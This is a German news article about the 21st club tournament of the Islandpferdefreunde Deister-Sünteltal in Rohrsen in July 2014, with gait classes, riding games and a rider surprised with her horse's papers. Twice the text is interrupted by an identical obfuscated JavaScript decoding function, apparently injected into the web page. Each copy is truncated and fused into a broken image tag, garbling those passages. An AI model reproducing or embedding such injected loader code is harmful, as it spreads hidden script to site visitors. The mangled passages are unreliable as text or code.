Islandpferde in Aktion

6. August 2014 | Von Redaktion | Kategorie: Gangpferdereitsport

[Rohrsen (GER)/M. Schwöbel]. Bei sommerlichen Temperaturen hatten die Islandpferdefreunde Deister-Sünteltal am 27. Juli 2014 zum 21. Vereinsturnier mit angeschlossenem „ Hestadagar“ auf die Anlage Hof Eichengrund in Rohrsen geladen. 40 bis 50 Vereinsreiter nehmen aktiv am Turniergeschehen teil, so Ortsbürgermeisterin Elke Osterkamp, die gleichzeitig Geschäftsführerin der Islandpferdefreunde ist und sich immer wieder äußerst aktiv ins Vereinsleben einbringt. In diesem Jahr war das Turnier offen ausgeschrieben, so dass sogar Reiter aus Schwarmstedt und Hildesheim am Start waren.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandpferde_NS7A6625_1" src="http://www.horse-today.de/wp-content/uploads/2014/08/Islandpferde_NS7A6625_1-199x300.jpg" alt="Bei der Prüfung "Blindes Führen" war Teamrbeit gefragt (Foto: Marianne Schwöbel)." width="199" height="300" />

Bei der Prüfung "Blindes Führen" war Teamrbeit gefragt (Foto: Marianne Schwöbel).

Erfreulich viele Zuschauer verfolgten das Geschehen auf der Ovalbahn. Fest im Terminkalender der Rohrsener ist diese Veranstaltung in der Zwischenzeit eingetragen. Zahlreiche „ Einheimische“ schauten vorbei und versorgten sich an Salatbar und Grillbuffet oder genossen den leckeren Kuchen.

Neben den sportlichen Prüfungen in unterschiedlichen Variationen des Gangreitens wie Mehrgang, Viergang und reinen Töltprüfungen, hatte sich das Organisatorenteam um Nina Gudjonsdottir allerlei Interessantes im Bereich der Breitensportlichen Wettbewerbe ausgedacht.

Knifflige Aufgaben galt es im Trail zu lösen, der dieses Mal eine leichtere Variante für die „Newcomer“ enthielt. Waren die Kinder im letzten Jahr teilweise noch in der Führzügelklasse gestartet, so war ihre Ausbildung nun so weit fortgeschritten, dass sie schon selbstständig in einigen Prüfungen mitmischten. Bewundernswert allerdings die Ruhe und Gelassenheit, mit der die meisten Islandpferde an diese Aufgaben herangingen.
Beim „ Blinden Führer“ erlebten die Teilnehmer das Gelände einmal aus ganz anderer Perspektive. Wohl dem, der hier auf genaue Anweisungen vom Sattel aus hoffen konnte.
Spannend war das Kartoffelrennen, das Louisa vom Hofe mit ihrem knuddeligen Simon souverän für sich entschied. In der Gleichmäßigkeitsstafette, bestehend aus einem Reiter, einem Läufer und einem Fahrradfahrer, ging es darum, in möglichst gleichen Zeiten die Ovalbahn zu umrunden—Uhren waren dabei allerdings verboten, und so war ein gutes Zeitgefühl gefragt.

Immer wieder humorvoll kommentiert wurden die Prüfungen von den Sprecherinnen Wiebke Hein und Mirja Plischke. Auch die Richter Glenn Kessler (Delmenhorst) und Silke Köhler (Schneverdingen) hatten ihren Spaß und freuten sich besonders über den Nachwuchs im Sattel. Tölt in allen Tempi konnte man bewundern und sogar eine Reiterin, die sich an den fünften Gang, den Rennpass, heranwagte.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandpferde_NS7A7217_1" src="http://www.horse-today.de/wp-content/uploads/2014/08/Islandpferde_NS7A7217_1.jpg" alt="Ein "Klassiker" unter den Reiterspielen: das Kartoffelreiten (Foto: Marianne Schwöbel)." width="600" height="399" />

Ein "Klassiker" unter den Reiterspielen: das Kartoffelreiten (Foto: Marianne Schwöbel).

Als Zuschauer der Viergangprüfungen war man immer wieder überrascht, welch dynamischen Trab und Galopp die agilen Pferde aus dem Norden neben Tölt und Schritt beim Kommando „Langsames bis Mitteltempo Trab oder Galopp)“ zu bieten hatten. In der Führzügelklasse zeigten die Kleinsten, was in ihnen steckt.

Die Schwarmstedterin Melanie Möller nahm mit ihrem Pflegepferd Mana, einer hübschen Fuchsstute, erstmals an einem Turnier teil. Eine Schleife für den fünften Platz in der Töltprüfung war der Lohn - doch plötzlich wurde für sie ein Sonderehrenpreis verkündet. Mit einer großen Schleife, auf der die Aufschrift „Melanie`s Mana“ prankte, überreichte ihr Mann ihr die Papiere der Stute. Eine vor Glück vollkommen sprachlose Melanie Möller stand völlig gerührt neben ihrem Pferd. Das ging auch den Zuschauern unter die Haut, und alle strahlten mit der frischgebackenen Pferdebesitzerin um die Wette.

Am Ende der Veranstaltung konnten zwei Gesamtsieger gekürt werden. Die Kinderklassensiegerin des Vorjahres, Louisa vom Hofe, gewann in diesem Jahr mit ihrem schleifengeschmückten Simon vom Hof Osterkamp die Jugendklasse. Lena Racket entschied die offene Klasse mit Brynja vom Maischeiderland für sich.

Abschließend dankte der Vereinsvorsitzende Kai Mordaschewitz (Hülsede) allen, die zum Gelingen dieses „Hestadagars“ beigetragen hatten und lud zu einem geselligen Beisammensein ins Festzelt.

Fotos: Marianne Schwöbel]

Socialize:
  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Digg
  • Facebook
  • FriendFeed
  • LinkArena
  • MisterWong.DE
  • NewsVine
  • Yigg
  • StumbleUpon
  • Yahoo! Bookmarks
  • MySpace
  • Netvibes
  • Technorati
  • RSS
  • Print
Tags: , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=121475

Hier klicken, um einen Kommentar zu schreiben